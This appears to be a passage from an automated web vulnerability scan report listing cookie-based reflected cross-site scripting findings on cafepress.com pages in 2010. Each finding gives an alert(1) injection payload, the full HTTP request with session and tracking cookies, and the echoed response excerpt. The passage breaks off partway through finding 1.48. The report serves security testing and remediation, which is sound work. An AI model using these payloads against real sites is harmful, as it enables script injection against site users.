The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2e9e</script><script>alert(1)</script>cefee2eaa5b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+journals HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b2e9e</script><script>alert(1)</script>cefee2eaa5b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59387
Date: Sun, 26 Dec 2010 13:49:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:08 GMT; path=/
Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:08 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'b2e9e</script><script>alert(1)</script>cefee2eaa5b ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.44. http://www.cafepress.com/+keepsake_boxes [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+keepsake_boxes
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18c76"-alert(1)-"2689714fbb2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+keepsake_boxes HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA18c76"-alert(1)-"2689714fbb2 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 59056
Date: Sun, 26 Dec 2010 13:49:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:12 GMT; path=/
Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:12 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA18c76"-alert(1)-"2689714fbb2 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.45. http://www.cafepress.com/+keepsake_boxes [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+keepsake_boxes
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f272a</script><script>alert(1)</script>d1528753cbe was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+keepsake_boxes HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f272a</script><script>alert(1)</script>d1528753cbe ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 59083
Date: Sun, 26 Dec 2010 13:49:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/
Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'f272a</script><script>alert(1)</script>d1528753cbe ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.46. http://www.cafepress.com/+license_plate_frames [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+license_plate_frames
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe28"-alert(1)-"4e9cbe178c4 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+license_plate_frames HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA7fe28"-alert(1)-"4e9cbe178c4 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59959
Date: Sun, 26 Dec 2010 13:48:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/
Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA7fe28"-alert(1)-"4e9cbe178c4 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.47. http://www.cafepress.com/+license_plate_frames [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+license_plate_frames
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df2e</script><script>alert(1)</script>12b946216a2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+license_plate_frames HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=2df2e</script><script>alert(1)</script>12b946216a2 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59978
Date: Sun, 26 Dec 2010 13:48:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '2df2e</script><script>alert(1)</script>12b946216a2 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.48. http://www.cafepress.com/+magnets [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+magnets
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48b1e"-alert(1)-"48ef400b324 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+magnets HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; 